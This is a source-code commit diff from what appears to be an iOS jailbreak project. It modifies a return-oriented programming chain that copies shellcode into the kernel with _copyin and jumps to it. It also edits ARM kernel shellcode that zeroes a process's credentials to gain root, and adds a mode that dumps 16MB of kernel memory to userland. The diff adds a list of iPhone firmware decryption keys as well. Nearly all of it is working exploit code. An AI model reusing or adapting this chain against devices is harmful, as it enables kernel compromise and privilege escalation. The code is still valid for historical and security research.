2 weeks later

comex · May 23, 2011 · fd5fd5a · fd5fd5a
1 parent 65440f9
commit fd5fd5a
Show file tree

Hide file tree

Showing 13 changed files with 97 additions and 328 deletions.
diff --git a/catalog/catalog.py b/catalog/catalog.py
@@ -41,14 +41,12 @@ def dbg_result():
 
         funcall('_fprintf', dmini.cur.sym('___stderrp'), ptr('Result for %s:%d was %%08x\n' % (back.f_code.co_filename, back.f_lineno), True), result, load_r0=True)
 
-dmini.init(cachefile, True)
-
 dmini.init(kernfile, False)
 
 sysent = dmini.cur.find_basic('- 00 10 86 00') + 4
 
 code_addr = 0x80000400 # XXX
-weirdfile = dmini.Connection(kcode, rw=True).relocate(dmini.cur, code_addr).nth_segment(0)[:-8]
+weirdfile = dmini.Connection(kcode, rw=True).relocate(dmini.cur, code_addr).nth_segment(0).data()[:-8]
 count = 0
 stuff = ''
 while True:
@@ -68,10 +66,10 @@ def mov_r0_r6():
     exhaust_fwd('R4', 'R5', 'R6')
     heapadd(fwd('R4'), fwd('R5'), fwd('R6'), fwd('PC'))
 
-def lsl_r5_r7_1():
-    set_fwd('PC', dmini.cur.find_basic('+ 7d 00 cc bd'))
-    exhaust_fwd('R2', 'R3', 'R5', 'R6', 'R7')
-    heapadd(fwd('R2'), fwd('R3'), fwd('R6'), fwd('R7'), fwd('PC'))
+def str_r7_sp_856():
+    set_fwd('PC', dmini.cur.find_basic('+ d6 97 e9 bd'))
+    exhaust_fwd('R0', 'R3', 'R5', 'R6', 'R7')
+    heapadd(fwd('R0'), fwd('R3'), fwd('R5'), fwd('R6'), fwd('R7'), fwd('PC'))
 
 def seek_kernel_ldm(reg):
     s = chr(0x90 | reg) + chr(0xe8)
@@ -89,7 +87,7 @@ def seek_kernel_ldm(reg):
             if 'SP' not in regs or 'PC' not in regs: continue
             if 'R0' in regs or 'R7' in regs: continue
             # got it
-            return (dmini.cur.nth_segment_addr(seg) + i - 2, regs)
+            return (dmini.cur.nth_segment(seg).start + i - 2, regs)
 
         seg += 1
 
@@ -100,23 +98,24 @@ def seek_kernel_ldm(reg):
 init(*kernel_ldm_regs)
 
 #set_fwd('PC', 0xdeadbeee); heapadd(fwd('PC'))
+obj = ptrI(0)
 
 m = pointed('')
 set_fwd('SP', pointer(m))
 heapadd(m)
-obj = ptrI(0)
 mov_r0_r6()
-lsl_r5_r7_1()
 store_r0_to(obj)
+str_r7_sp_856()
+
 make_r4_avail()
 funcall('_copyin', pointer(weirdfile), code_addr, len(weirdfile))
 funcall('_flush_dcache', code_addr, len(weirdfile), 0)
-load_r0_from(obj)
+set_fwd('R4', obj)
 set_fwd('PC', code_addr)
 
+
 kstuff = finalize(None, must_be_simple=False)
-#heapdump(kstuff)
-#assert len(kstuff) == 0x70
+kstuff += '\0'*(856 + 0x38 + 4 - len(kstuff)) # xxx offset
 
 dmini.init(cachefile, True)
 
@@ -167,14 +166,16 @@ def wrap(num):
     transaction[0x70:0x74] = I(6)
 transaction = simplify(transaction)
 
+set_r0_to(kstuffp); dbg_result()
+
 # The manpage says this returns EINVAL, but in fact the kernel handles it.
 funcall('_mlock', kstuffp, len(kstuff)); dbg_result()
 
 zerop = ptrI(0)
 
 if mode == 'untether':
     # XXX is this necessary? it's from star
-    funcall('iokit._IOKitWaitQuiet', 0, ptrI(0, 0, 0))
+    funcall('iokit._IOKitWaitQuiet', 0, 0)#ptrI(0, 0, 0))
 
 funcall('iokit._IOServiceMatching', ptr('AppleRGBOUT', True))
 #funcall('iokit._IOServiceMatching', ptr('AppleCLCD', True))
@@ -250,4 +251,4 @@ def wrap(num):
 
     final = finalize(address)
     #heapdump(final)
-    open('two.txt', 'w').write(pickle.dumps({'segment': final, 'initializer': initializer, 'init_sp': init_sp, 'rop_address': address, 'libs': lib_paths}))
+    open('two.txt', 'w').write(pickle.dumps({'segment': final, 'initializer': initializer, 'init_sp': init_sp, 'rop_address': address, 'libs': lib_paths, 'dylib': False}))
diff --git a/catalog/kcode.S b/catalog/kcode.S
@@ -7,14 +7,15 @@
 .syntax unified
 .arm
 start:
-    asr sp, r5, #1
+    # xxx offset
+    ldr sp, [sp, #(856 + 0x38 - 0x98)]
     sub sp, #0x18
-    mov r6, r0
+    ldr r6, [r4]
 
     adr r0, inspiring
     bl _IOLog
 
-    #mov r8, #0; b end; foo
+    #mov r8, #0; b end
 
     adr r5, stuff
     ldr r8, count
@@ -46,33 +47,53 @@ end:
     str r0, [r6, #c(0x220, 0x188)]
     str r0, [r6, #c(0x224, 0x18c)]
 
-#ifdef DEJAVU
+#if defined(DEJAVU) || defined(DUMP)
     ldr r0, sysent
     adr r1, syscall_0
     str r1, [r0, #0x4]
 #endif
 
+#ifdef DUMP
+    mov r0, #(16*1024*1024)
+    bl _IOMalloc
+    str r0, dumpbuf
+    mov r1, #0x80000000
+    mov r2, #(16*1024*1024)
+    bl _memcpy
+#endif
+
     pop {r8, r10, r11}
     pop {r4-r7, pc}
 
-#ifdef DEJAVU
+#if defined(DEJAVU) || defined(DUMP)
 syscall_0:
     push {lr} 
+#ifdef DUMP
+    ldr r0, dumpbuf
+    mov r1, #0x10000000 
+    mov r2, #(16*1024*1024)
+    bl _copyout
+#else
     bl _proc_ucred
     mov r1, #0
     str r1, [r0, #0xc]
     ldr r0, [r0, #0x6c]
     cmp r0, #0
     strne r1, [r0, #8]
+#endif
     ldr r0, sysent
     ldr r1, [r0, #0xc4]
     str r1, [r0, #0x4]
     pop {pc}
 #endif
+
 
 inspiring: .asciz "I exist!\n"
 .align 2
-
+#ifdef DUMP
+dumpbuf: .long 0
+#endif
 sysent: .long 0
 count: .long 0
 stuff:
+
diff --git a/config/keyz.txt b/config/keyz.txt
@@ -475,3 +475,20 @@ iPhone3,1_4.2.1_8C148.KernelCache: 9c32276861ad6935b5ed0af954de8953d569492b14be3
 iPhone3,1_4.2.1_8C148.LLB: 3c135743c32306664125a9e07cc280ee8fd014830353e385fb13a85b28698d05 e0514f26e05ab9db509033f36d7440e8
 iPhone3,1_4.2.1_8C148.RecoveryMode: ff278adcb52647785fd58ad689739fdcdace7acd08d932b4c32d54ea2c2032d8 9a59ae16a84808e8d7546269e36a21c0
 
+iPhone3,1_4.3.3_8J2.fs: 246f17ec6660672b3207ece257938704944a83601205736409b61fc3565512559abd0f82
+iPhone3,1_4.3.3_8J2.LLB: 63083d71e1039bca175ac4958bcb502f655f59a56c7008d516328389a3abae4f 598c1dc81a30e794814d884d4baca4a9
+iPhone3,1_4.3.3_8J2.iBoot: c2ead1d3b228a05b665c91b4b1ab54b570a81dffaf06eaf1736767bcb86e50de bb3fc29dd226fac56086790060d5c744
+iPhone3,1_4.3.3_8J2.DeviceTree: ee8c985b98fa297c43ccbe1cfdb18bd5998d5cf118f67f9fd452e624f128958f d94f193539d8ec75a94b142e15a2c8a4
+iPhone3,1_4.3.3_8J2.AppleLogo: dc88579aa656b45b84434be0f06fa7aa1c5d882570735a8be0631a0a1266d395 49fd14184476100852003f01417f0c88
+iPhone3,1_4.3.3_8J2.RecoveryMode: f78eb7941b52b9334788af522f4448445c7084eaf8d5ff5122e60d39c615232c 4b0a59643dce66626fef9a8a007513aa
+iPhone3,1_4.3.3_8J2.BatteryLow0: 883aebcff47525c1b207e2dd235b598178fb34c880461bf747328c954f9f6c1d 68e672b9c9edb53bce7aa42cc0731d96
+iPhone3,1_4.3.3_8J2.BatteryLow1: a6874699b8e099213c8df52b547abfd2369ee486796a58067c4cf4cd284b1dcf 6e6bfe42c6e76cbedb50d4f0c3494dda
+iPhone3,1_4.3.3_8J2.GlyphCharging: fca979f5237b7cf1d9f7f8d062613b96d7042d87c50064e1ab0eed78fc16d0e8 790c065f77bf0ce1dd773c375f40e9c4
+iPhone3,1_4.3.3_8J2.GlyphPlugin: 74188043e1c49c79c1b9d5751c1b2be3b7c637456e4ad6dc24457945e6608962 cb02e76dfc7223c3ebea123c7a3f515f
+iPhone3,1_4.3.3_8J2.BatteryCharging0: 5afaafe8ab21cf5770dce18df7731adf27bc892cb0074aa1e5393c14f3b6fb48 ec3eb6512de895004947fb8cdd9268a8
+iPhone3,1_4.3.3_8J2.BatteryCharging1: 68e4f78fcfb0c372f0883fccb366ac3145922c497e3bfe90e37d441683353cc8 78efb0ad96b92bc13981a7dc92433c32
+iPhone3,1_4.3.3_8J2.BatteryFull: 80841122c5315319d149ed3d61a6ebfa08bb83d0c3a5dc2362d23773700cb6e6 b647af32aede8f7e2e298a037edd02ec
+iPhone3,1_4.3.3_8J2.iBSS: 8ef00005aa2c01ae409d55e330171589af79d76ac86639e76003835d5d82ffc4 cdd50b45ca1bac4f718d9eb23ce9f0a8
+iPhone3,1_4.3.3_8J2.iBEC: 54800715047034f61f786642e9caea65723ff410495dc68e7125c0519add859b e9467d0a0d35b1f2bcec6d0a60d0b499
+iPhone3,1_4.3.3_8J2.KernelCache: 65c351330f824889fe25b14e2d0cb5e291991a749f13761b825a70f317f005aa 301c0db0f6fc3a92c34f34b2dff5d92f
+
diff --git a/data b/data
diff --git a/goo/goo.py b/goo/goo.py
@@ -37,10 +37,6 @@ def heapdump(heap, names=None):
     sys.stdout.write('\n')
     sys.stdout.write('%08x end\n' % (4*i + 4))
 
-def pad(x, p):
-    l = len(x)
-    return x + '\0' * (-l & (p - 1))
-
 def ptr(str, null_terminate=False):
     global sheap
     if null_terminate: str += '\0'

diff --git a/goo/goop.py b/goo/goop.py
@@ -8,6 +8,9 @@ def getdebugname():
         if True and ('world' in fn or 'goo' in fn): continue
         return '%s:%d' % (fn, f.f_lineno)
 
+def pad(x, p):
+    l = len(x)
+    return x + '\0' * (-l & (p - 1))
 
 def simplify_times(heap, addr, times, must_be_simple=True):
     for i in xrange(times):
@@ -119,6 +122,7 @@ def simplify(self, addr):
     def unpack(self):
         bits = []
         for bit in self.bits:
+            if isinstance(bit, pointed_): bit = bit.sub
             if isinstance(bit, I_):
                 bits.append(bit.sub)
             elif isinstance(bit, str):
@@ -157,6 +161,12 @@ def __setslice__(self, i, j, seq):
     def __repr__(self):
         return '<troll_string (%r): %s>' % (self.length, self.bits)
 
+def join(strs):
+    t = troll_string('')
+    for s in strs:
+        t.append(s)
+    return t
+
 def len(x):
     return x.__len__()
 
@@ -243,6 +253,10 @@ def __rmul__(self, other):
         return self.later(other, lambda s, o: o * s)
     def __and__(self, other):
         return self.later(other, lambda s, o: s & o)
+    def __div__(self, other):
+        return self.later(other, lambda s, o: s / o)
+    def __rdiv__(self, other):
+        return self.later(other, lambda s, o: o / s)
     def __neg__(self):
         return later(lambda addr: -self.simplify(addr))
 

diff --git a/goo/two.py b/goo/two.py
@@ -42,7 +42,7 @@ def func(value, addr):
     0xfeedface,
     12, # CPU_TYPE_ARM
     6, # CPU_SUBTYPE_ARM_V6,
-    2, # MH_EXECUTE
+    6 if data['dylib'] else 2, # MH_DYLIB / MH_EXECUTE
     ncmds,
     len(commands), # sizeofcmds
     ( # flags
@@ -205,13 +205,14 @@ def reloc(sym, address):
     PROT_READ | PROT_WRITE
 )
 
-command(5, I( # LC_UNIXTHREAD
-    1, # ARM_THREAD_STATE
-    17, # ARM_THREAD_STATE_COUNT,
-    0, 0, 0, 0, 0, 0, 0, 0, # R0-R7
-    0, 0, 0, 0, 0, data['init_sp'], 0, linkedit_address, # R8-R15
-    0, # CPSR
-))
+if not data['dylib']:
+    command(5, I( # LC_UNIXTHREAD
+        1, # ARM_THREAD_STATE
+        17, # ARM_THREAD_STATE_COUNT,
+        0, 0, 0, 0, 0, 0, 0, 0, # R0-R7
+        0, 0, 0, 0, 0, data['init_sp'], 0, linkedit_address, # R8-R15
+        0, # CPSR
+    ))
 
 macho = simplify_times(segments, 0, 4)
 

diff --git a/goo/world1.py b/goo/world1.py
@@ -14,10 +14,9 @@ def load_r0_from(address):
     heapadd(fwd('R4'), fwd('R7'), fwd('PC'))
 
 def store_r0_to(address):
-    set_fwd('PC', dmini.cur.find_multiple('+ 20 60 90 bd', '- 00 00 84 e5 90 80 bd e8'))
+    set_fwd('PC', dmini.cur.find_basic('+ 20 60 10 bd'))
     set_fwd('R4', address)
-    exhaust_fwd('R7')
-    heapadd(fwd('R4'), fwd('R7'), fwd('PC'))
+    heapadd(fwd('R4'), fwd('PC'))
 
 def store_val_to(val, to):
     set_fwd('PC', dmini.cur.find_multiple('+ 25 60 b0 bd', '- 00 50 84 e5 b0 80 bd e8'))

diff --git a/install/install.m b/install/install.m
@@ -163,7 +163,7 @@ static void extract(const char *fn, bool use_null) {
         while(*pathname == '.' || *pathname == '/') pathname++;
         if(use_null && (
 #define O(x) !memcmp(pathname, x, strlen(x))
-            O("Applications") ||
+            //O("Applications") ||
             //O("Library") ||
             //O("System") ||
             //O("bin") ||
+13 −4		Makefile.common
+50 −35		binary.c
+11 −3		binary.h
+2 −0		cc.h
+4 −4		common.c
+7 −1		common.h
+97 −79		find.c
+12 −7		find.h
+1 −1		link.c
+6 −0		link.h
+2 −2		running_kernel.c
+4 −0		running_kernel.h